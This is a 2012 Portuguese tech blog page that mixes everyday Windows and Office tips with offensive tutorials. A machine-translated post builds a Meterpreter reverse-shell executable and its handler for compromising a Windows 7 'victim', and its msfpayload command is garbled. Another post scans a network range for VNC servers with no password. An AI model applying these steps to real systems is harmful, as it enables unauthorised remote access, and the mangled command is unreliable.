Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

terça-feira, 31 de julho de 2012

Como editar o arquivo HOSTS do Windows

 NOTA: Tutorial baseado no Win 7, mas a diferença só acontece no arquivo hosts, mas o passo-a-passo é o mesmo.
Este é um problema comum encontrado pelas pessoas que desejam modificar este arquivo e na hora de salvarem enfrentam problemas, vamos lá:

1- Primeiramente abra com o bloco de notas o arquivo HOSTS na pasta C:\Windows\System32\drivers\etc
2 - Suponhamos que você queira impedir que um programa acesse um determinado link usando aquele esquema de usar o ip loca (127.0.0.1), vejamos na imagem, em meu caso estou negando o acesso a dois links, eles são rad.msn.com e rad.live.com:
O esquema é colocar o ip antes do link, como visto na imagem.
3- Depois que você fez sua modificação de acordo com suas necessidades, na hora de salvar temos que prestar atenção, se você for em Arquivo e salvar, algumas vezes não é possível salvar. Então escolha "salvar como..." e salve em um local de fácil acesso, como o desktop.
4- Agora copie o arquivo que voce modificou e cole ele na pasta onde está o arquivo original, vai aparecer uma mensagem perguntando se deseja substituir. Basta clicar na opção desejada. E pronto!

Caso você não queira fazer manualmente, existe um programa específico para isso, clique aqui para baixá-lo.

segunda-feira, 30 de julho de 2012

mStartEX: Tenha um menu iniciar igual ao do Windows 8 no XP, Vista e 7

"MStartEX" é um utilitário gratuito para Windows criado por nosso amigo "Solodev", que mostra todos os programas do menu Iniciar e itens fixados, tendo em vista o azulejo semelhante a Tela Inicial do Win 8.

Por padrão ele classifica-os alfabeticamente, mas você pode desativar a classificação usando suas configurações. É altamente personalizável. Você pode mudar a cor de fundo, o nível de transparência, o modo de telha, posição da tela e muito mais.

Ele também permite que você mostre um relógio estilo metro na área de trabalho semelhante ao Windows 8. Você pode habilitá-lo a partir de suas configurações.


Apesar de sua utilidade livre, mas ele também vem com uma versão paga que pode ser ativada através da compra do produto para uma quantidade muito pequena de US $ 1,25 apenas. A versão paga vem com alguns recursos extras, como efeitos de mais de azulejo, modo de tela cheia que o faz parecer-como o Windows Start Screen 8, modo invisível para remover fundo, cor de fundo aleatória semelhante ao Windows Start Screen 8, ícones de pele, sem ordenação , etc

Atualmente os testes beta baixo e mais recursos serão adicionados em versões futuras, tais como sistema de plugins.

domingo, 29 de julho de 2012

Manutenção de PC: como descobrir qual parte do computador deu pau

Pra quem ainda é leigo no assunto, este vídeo do TecMundo me agradou bastante para lhes ensinar procedimentos básicos e simples de forma muito fácil para salvar teu bolso e seu pc de ir para as mãos de talvez pessoas que você mal conhece, evitando N transtornos.


sexta-feira, 27 de julho de 2012

Desativar a aceleração de hardware, corrigir Fonte turva e Problemas do cursor no Microsoft Office 2013

Nós já sabemos que a Microsoft lançou uma versão preview gratuita do novo Office 2013. Caso você também queira esperimentar, baixe por aqui:
É fato que este novo pacote possui novas melhorias como a aceleração gráfica por hardware ou também conhecida como aceleração GPU. Este novo recurso também pode ser encontrado em quase todos os navegadores modernos. Esta característica é usada para aumentar o desempenho do programa. 
 Mas às vezes esse recurso pode causar problemas em computadores antigos e até mesmo alguns computadores novos. Muitas pessoas que estão a testar o Office 2013 estão reclamando texto turva / font e problemas com o cursor.
Este tutorial vai lhe dizer como desativar "Hardware Acceleration Graphics" no Microsoft Office 2013 que irá corrigir esses problemas e vai proporcioná-lo uma melhor experiência do novo Office.
1. Primeiro, abra qualquer programa do Office 2013. Por exemplo abra o Word 2013. Vai abrir no novo modo de tela de Início. Clique em "Blank document".
2. Agora clique na presente menu "File" na fita e em seguida, clique no link "Options" dada no final da barra lateral esquerda.
3. Vai abrir a janela Options. Clique na aba "Advanced" e desça um pouco. Procure seguir 2 opções em "Display" seção:
  • Desativar a aceleração de hardware gráfico
  • Use posicionamento subpixel para fontes suaves na tela
Primeira opção seria desmarcada ea segunda opção seria marcada por padrão.
4. Primeiro lugar, ative "Disable hardware graphics acceleration" e clique no botão OK. Reinicie o programa e ele deve resolver o problema.
5. Se ele não resolver o seu problema, tente desabilitar o "Use subpixel positioning to smooth fonts on screen" opção, clique no botão OK e reinicie o programa. 
 

quinta-feira, 26 de julho de 2012

Windows Live muda formulário de login do Hotmail e assusta usuários

Ontem, quarta-feira (26/07) a Windows Live modificou o formulário de login do Hotmail(c) trazendo um layout muito parecido com o do Gmail(c) e outros sites da gigante de pesquisa. A princípio essa semelhança causou desconfiança dos usuários quanto a veracidade da página por conter uma tela muito próxima a do site Gmail. Alguns até deixaram de acessar suas contas pelo fato. Porém, observando a barra de links é possível visualizar o certificado de autenticidade, e o protocolo https://, veja:


A pergunta que não quer calar neste momento é, qual foi a intenção da Windows Live em criar formulário com tamanha semelhança com seu maior concorrente?

quarta-feira, 25 de julho de 2012

Compactação de imagens JPEG / JPG

Estou utilizando esta imagem propositalmente, ok?
Comecei com esta imagem para chamar a atenção para aquele quem pensa que somente abaixando a qualidade da imagem é possível reduzir seu tamanho. A princípio pode parecer pouco, mas a segunda imagem obteve uma compactação de quase 70%. Comparando as duas imagens é possível perceber que a a alteração visual foi praticamente nula. Posso garantir que as duas imagens estão no formato JPEG/JPG.
Muitas vezes eu que trabalho com Web Design me deparo com o problema de sites que ficam muito sobrecarregados com a quantidade de imagens que possui, e a compactação é minha grande arma para diminuir o tamanho do sites possibilitando aos usuários de baixa conexão acessarem com rapidez e qualidade o site desejado.
Quem conhece um pouco sobre o assunto sabe que imagens em formato .GIF são inconparáveis na compactação, mas a qualidade da imagem cai muito, o que acaba impossibilitando seu uso em diversas ocasiões. Mas com esta compactação seus problemas acabaram! Como eu consegui esta façanha? Utilizando um multi-conversor chamado Format Factory. Para proceder a compactação basta escolher sua imagem em JPEG e mandar converter para o mesmo formato, em seguida compare a qualidade e o tamanho da imagem, utilizando um wallpaper de 858 kb consegui reduzir para 205kb! Compactação de 76%!

segunda-feira, 23 de julho de 2012

Criando um simples Exploit hack usando Metasploit para Windows 7

NOTA: "Vou ficar devendo um passo a passo melhor traduzido e exlicado pois estou sem o Backtrack em minha máquina para acompanhar o tutorial e traduzí-lo melhor. Para aumentar a imagem basta clicar sobre ela. Att, Guilherme."

O tutorial de hoje vamos aprender como criar um exploit simples (fácil de criar e de fácil implementação :-) ) E como se conectar ao Windows 7 que já vítima executada a nossa exploração simples ... simples não é?

Ok, vamos iniciar o tutorial.
Requisitos: 

1. Metasploit Framework
2. Windows XP ea versão anterior do Windows (eu uso o Windows 7 SP1)

Passo a passo:
FYI neste tutorial eu uso Backtrack R2 5 com Metasploit Framework 4.2.0, e meu endereço IP é 192.168.8.91. 1. Abra o seu console, o terminal e digite o seguinte comando:

msfpayload windows / Meterpreter / reverse_tcp LHOST = 192.168.8.91 X> Desktop/


O comando acima irá criar arquivo executável do Windows com o "v4L.exe" nome e será salvo no seu desktop.
2. Agora você precisa copiar o v4L.exe recém-criado para o seu sistema Windows 7. Se você não sabe como compartilhar sua recuar 5 pasta, você pode videw o tutorial de como compartilhar pasta no seu Backtrack ( ver tutorial aqui ).
3. O próximo passo que precisamos para criar um manipulador para manipular a conexão que veio ao nosso sistema de exploração Backtrack simples já criamos antes. Abra seu console Metasploit, veja a foto e digite o seguinte comando:

Informações:

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler


4. Agora você pode tentar executar o exploit simples já copiar para o Windows 7 e ver se o nosso manipulador de receber algo ou não. Abaixo foi o screenshot do meu manipulador quando o Windows 7 executou o exploit simples:


Eu uso sessions -l para listar cada sessões que já abertos lá.

5. Para interagir com a sessão disponível, você pode usar sessions -i . De lá você pode fazer outro comando que você deseja.


fonte: http://vishnuvalentino.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

Traduzido com Google Translator.

quarta-feira, 18 de julho de 2012

VNC Authentication Scanner

O VNC Authentication Scanner irá pesquisar uma faixa de endereços IP em busca de alvos que estão executando um servidor VNC sem uma senha configurada. Muito bem todo administrador de valor define uma senha antes de permitir conexões de entrada, mas você nunca sabe quando você pode pegar um administrador burro pela frente.

Vamos utilizar o metasploit(Vem Incluso no Sistema Operacional BACKTRACK )  para localizar os ips com VNC sem senhas.

(Mais Informações do MetaSploit : http://www.metasploit.com/

Para utilizar o scanner de VNC, primeiro selecione o módulo auxiliar, defina as opções, em seguida, de um start.


msf auxiliary(vnc_none_auth) > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(vnc_none_auth) > show options


Module options:


   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    5900             yes       The target port
   THREADS  1                yes       The number of concurrent threads


msf auxiliary(vnc_none_auth) > set RHOSTS 10.0.0.0/24
RHOSTS => 10.0.0.0/24
msf auxiliary(vnc_none_auth) > set THREADS 50
THREADS => 50
msf auxiliary(vnc_none_auth) > run


[*] 10.0.0.3:5900, VNC server protocol version : RFB 003.008
[*] 10.0.0.3:5900, VNC server security types supported : None, free access!
[*] Auxiliary module execution completed


No exemplo acima deixei meu computador sem senha, o metasploit identificou e reportou com um “None, free access!”.


FONTE : unknownantisec

quarta-feira, 11 de julho de 2012

Vai fazer um churrasco? Quer saber o quanto vai gastar? Siga a dica!

Também acho, porece estranho eu estar dando dicas de churrasco em um blog de informática! Mas na verdade mais uma vez a informática vem nos ajudar no nosso cotidiano, mesmo no churrascão com os amigos, duvida?

Exitem na internet várias ferramentas que te auxiliam a prever o quanto você gastará carne, bebidas e acopanhantes, dentre eles o que mais me agradou por me trazer um resultado quase perfeito foi o Churrascolator, me ajudou bastante, nele você pode adicionar tudo que normalmente vai em um churrasco, e poderá também dizer se quer mais ou menos na quantidade.

Vale à pena conferir!

quinta-feira, 5 de julho de 2012

Megaupload esta prestes a voltar melhor do que antes!

Nesta quarta-feira (04/07) o fundador do Megaupload, Kim Doctom, afirmou que o site voltará ao ar maior, melhor mais rápido.  Além disso comemorou o fim dos projetos de lei que visam aumentar o controle do tráfego de dados na internet.

" 'SOPA está morto. PIPA está morto. ACTA está morto. MEGA vai voltar. Maior. Melhor. Mais rápido. Livre de taxas e preparado contra ataques. Evolução!', comentou Dotcom em sua mensagem. Entretanto, apesar de não informar quando isso de fato vai acontecer, alguns rumores ganharam força na rede, afirmando que o retorno aconteceria no próximo dia 9." Tecmundo.

Só nos resta aguardar se o site voltará mesmo ao ar e seu os antigos links serão recuperados ou não. Até então, esta são as informações que circulam na net.

terça-feira, 3 de julho de 2012

Serviço de SMS grátis testado e aprovado!

A um bom tempo a nossa ferramenta de SMS GRÁTIS vem apresentando problemas com algumas operadoras, e achei na rede um site que entre muitos foi o único que me retornou a mensagem que enviei, lembrando que testei com a operadora VIVO, se você é de outra operadora, caso não seja um encomodo poste nos comentários o resultado de seu teste! O Delay (atraso de entrega) dele é bastante pequeno, mesmo sendo um servidor gringo, o tempo de entrega é o mesmo que servidores brasileiros. Vamos lá, clique aqui para acessar o site.

ATENÇÃO

  • Ao escolher o país em Select Country aparecerá no campo Mobile Number o código 0055 que representa o Brasil, basta digitar a área + o número do telefone. Ex.: 00552899999999
  • Evite usar caracteres especiais como cedilha (Ç) e assentos, pois o o servidor provavelmente está preparado para reconhecer em inglês e não vai reconhecer estes caracteres.
  • Lembre-se de se identificar na mensagem!
  • Use sem moderação!